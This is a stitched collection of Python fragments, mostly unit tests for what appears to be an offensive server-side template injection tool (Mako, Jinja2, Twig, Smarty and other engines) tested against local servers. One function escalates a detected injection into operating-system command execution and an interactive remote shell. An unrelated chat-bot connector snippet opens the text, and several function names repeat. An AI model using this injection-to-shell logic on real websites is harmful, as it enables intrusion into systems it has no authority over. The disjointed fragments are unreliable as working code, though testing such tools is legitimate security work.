def _on_schedule(self): """ This method is called repeatedly from an event loop """ return # sender/receiver/stream id's are automatically translated by the base class Connector # when calling methods _pop_message_to_send() and _push_received_message() # example of incoming message for the bot in private message = Message.build('Hi @globot please ask for service #sample') channel = Channel(11, 0, None, self.get_name()) self._push_received_message(message, channel) # example of incoming message for the bot in chatroom message = Message.build('Hi @globot please ask for service #sample') channel = Channel(60, 0, 777, self.get_name()) self._push_received_message(message, channel) # example of incoming message in chatroom for another agent message = Message.build('Hi folks nothing new today') channel = Channel(11, 60, 777, self.get_name()) self._push_received_message(message, channel) # example of outgoing message while True: ret = self._pop_message_to_send() if ret is None: break (message, channel) = ret
def test_reflection(self): template = '%s' channel = Channel({'url': 'http://127.0.0.1:15003/velocity?inj=*'}) Velocity(channel).detect() self.assertEqual(channel.data, self.expected_data)
def test_reflection_unsecured(self): channel = Channel({ 'url' : 'http://127.0.0.1:15002/twig-1.24.1-secured.php?inj=*' }) Twig(channel).detect() self.assertEqual(channel.data, self.expected_data)
def test_reflection_within_text(self): template = 'AAAA%sAAAA' channel = Channel({'url': 'http://127.0.0.1:15003/freemarker?inj=*'}) Freemarker(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def main(): args = vars(cliparser.options) if not args.get('url'): cliparser.parser.error('URL is required. Run with -h for help.') checks.check_template_injection(Channel(args))
def test_reflection_context_text(self): template = 'AAAA%sAAAA' channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*' % template }) Jinja2(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_reflection_unsecured(self): channel = Channel({ 'url': 'http://127.0.0.1:15002/smarty-3.1.29-unsecured.php?inj=*' }) Smarty(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_no_reflection(self): channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/mako?inj2=asd2', 'force_level': [0, 0], 'injection_tag': '*' }) detect_template_injection(channel, [Mako]) self.assertEqual(channel.data, {})
def test_reflection_secured(self): channel = Channel( {'url': 'http://127.0.0.1:15002/smarty-3.1.29-secured.php?inj=*'}) Smarty(channel).detect() expected_data = self.expected_data.copy() del expected_data['eval'] del expected_data['exec'] self.assertEqual(channel.data, expected_data)
def _get_detection_obj_data(self, url, level=0, closure_level=0): channel = Channel({'url': url, 'force_level': [level, closure_level]}) obj = self.plugin(channel) obj.detect() # Delete OS to make the tests portable if 'os' in channel.data: del channel.data['os'] return obj, channel.data
def test_header_reflection(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/header/mako', 'headers': ['User-Agent: *'] }) Mako(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_quotes(self): channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd', 'force_level': [0, 0], 'injection_tag': '*' }) obj = detect_template_injection(channel, [Mako]) result = obj.execute("""echo 1"2"'3'\\"\\'""") self.assertEqual(result, """123"'""") channel = Channel({ 'url': 'http://127.0.0.1:15001/blind/mako?inj=asd', 'force_level': [0, 0], 'injection_tag': '*' }) obj = detect_template_injection(channel, [Mako]) self.assertTrue(obj.execute_blind("""echo 1"2"'3'\\"\\'"""))
def test_reflection_multiple_point_no_tag(self): channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd&inj2=asd2', 'force_level': [0, 0], 'injection_tag': '*' }) detect_template_injection(channel, [Mako]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_reflection_point_dont_startswith(self): channel = Channel({ 'url': 'http://127.0.0.1:15001/startswith/mako?inj=*&startswith=thismustexists', 'force_level': [0, 0], 'injection_tag': '*' }) detect_template_injection(channel, [Mako]) self.assertEqual(channel.data, {})
def test_post_reflection(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/post/mako', 'post_data': ['inj=*'] }) Mako(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_reflection(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=*' % template }) Mako(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_post_reflection(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/post/mako', 'force_level': [0, 0], 'data': 'inj=*&othervar=1' }) Mako(channel).detect() del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_reflection_quotes(self): channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/jinja2?&inj=*', }) jinja2 = Jinja2(channel) result = jinja2.execute('echo 1"2"') self.assertEqual(result, '12') result = jinja2.execute('echo 1\\"2') self.assertEqual(result, '1"2')
def test_reflection_point_startswith(self): channel = Channel({ 'url' : 'http://127.0.0.1:15001/startswith/mako?inj=thismustexists*&startswith=thismustexists', 'force_level': [ 0, 0 ], 'injection_tag': '*', 'technique': 'R' }) detect_template_injection(channel, [ Mako ]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def checkTemplateInjection(args): channel = Channel(args) current_plugin = None # Iterate all the available plugins until # the first template engine is detected. for plugin in plugins: current_plugin = plugin(channel) current_plugin.detect() if channel.data.get('engine'): break # Kill execution if no engine have been found if not channel.data.get('engine'): log.fatal( """Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests.""" ) return # If there are no operating system actions, exit if not any(f for f, v in args.items() if f in ('os_cmd', 'os_shell') and v): log.warn("""Tested parameters have been found injectable.""") if channel.data.get('exec'): log.warn( """Try options '--os-cmd' or '--os-shell' to access the underlying operating system.""" ) # Execute operating system commands if channel.data.get('exec'): if args.get('os_cmd'): print current_plugin.execute(args.get('os_cmd')) elif args.get('os_shell'): log.warn('Run commands on the operating system.') Shell(current_plugin.execute, '%s $ ' % (channel.data.get('os', ''))).cmdloop() # Execute operating system commands if channel.data.get('engine'): if args.get('tpl_code'): print current_plugin.inject(args.get('os_cmd')) elif args.get('tpl_shell'): log.warn( 'Inject multi-line template code. Double empty line to send the data.' ) MultilineShell(current_plugin.inject, '%s $ ' % (channel.data.get('engine', ''))).cmdloop()
def test_wrong_auth_reflection(self): channel = Channel({ 'url' : 'http://localhost:15001/reflect_cookieauth/mako?inj=asd*', 'force_level': [ 0, 0 ], 'headers' : [ 'Cookie: SID=WRONGSECRET' ], 'injection_tag': '*', 'technique': 'R' }) detect_template_injection(channel, [ Mako ]) self.assertEqual(channel.data, {})
def test_url_reflection(self): channel = Channel({ 'url' : 'http://127.0.0.1:15001/url/mako/AA*AA', 'force_level': [ 0, 0 ], 'injection_tag': '*', 'technique': 'R' }) detect_template_injection(channel, [ Mako ]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_reflection_multiple_point(self): template = '%s' channel = Channel({ 'url' : 'http://127.0.0.1:15001/reflect/mako?tpl=%s&asd=1&asd2=*&inj=*&inj2=*&inj3=*', 'force_level': [ 0, 0 ], 'injection_tag': '*' }) detect_template_injection(channel, [ Mako ]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_reflection_limit(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/limit/mako?tpl=%s&inj=*' % template }) Mako(channel).detect() expected_data = {'render_tag': self.expected_data['render_tag']} self.assertEqual(channel.data, expected_data)
def test_custom_injection_tag(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=~', 'force_level': [0, 0], 'injection_tag': '~' }) detect_template_injection(channel, [Mako]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def test_header_reflection(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/header/mako', 'force_level': [0, 0], 'headers': ['User-Agent: *'], 'injection_tag': '*' }) detect_template_injection(channel, [Mako]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)
def _get_detection_obj_data(self, url, level = 5): channel = Channel({ 'url' : url }) obj = self.plugin(channel) obj.channel.args['level'] = level obj.detect() # Delete OS to make the tests portable if 'os' in channel.data: del channel.data['os'] return obj, channel.data
def test_reflection_context_code(self): template = '{{%s}}' channel = Channel({ 'url': 'http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*' % template }) Jinja2(channel).detect() expected_data = self.expected_data.copy() expected_data.update({'prefix': '""}}', 'suffix': '{{""'}) del channel.data['os'] self.assertEqual(channel.data, expected_data)
def _get_detection_obj_data(self, url, level = 0, closure_level = 0): channel = Channel({ 'url' : url, 'force_level': [ level, closure_level ], 'injection_tag': '*' }) obj = detect_template_injection(channel, [ self.plugin ]) # Delete OS to make the tests portable if 'os' in channel.data: del channel.data['os'] return obj, channel.data
def test_put_reflection(self): template = '%s' channel = Channel({ 'url': 'http://127.0.0.1:15001/put/mako', 'data': 'inj=*&othervar=1', 'request': 'PUT', 'force_level': [0, 0], 'injection_tag': '*' }) detect_template_injection(channel, [Mako]) del channel.data['os'] self.assertEqual(channel.data, self.expected_data)